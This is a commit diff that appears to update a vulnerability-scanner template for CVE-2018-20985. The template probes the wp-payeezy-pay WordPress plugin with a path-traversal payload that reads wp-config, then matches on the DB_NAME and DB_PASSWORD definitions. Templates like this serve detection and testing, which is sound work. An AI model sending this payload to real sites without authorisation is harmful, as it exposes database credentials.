Update CVE-2018-20985.yaml
parent
a0581944aa
commit
4db131a5d3
|
@ -15,14 +15,16 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
|
- "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
|
||||||
|
|
||||||
body: "x_login=../../../../wp-config"
|
body: "x_login=../../../wp-config"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- DB_NAME
|
- "The base configuration for WordPress"
|
||||||
- WPENGINE_ACCOUNT
|
- "define( 'DB_NAME',"
|
||||||
|
- "define( 'DB_PASSWORD',"
|
||||||
|
condition: and
|
||||||
part: body
|
part: body
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
Loading…
Reference in New Issue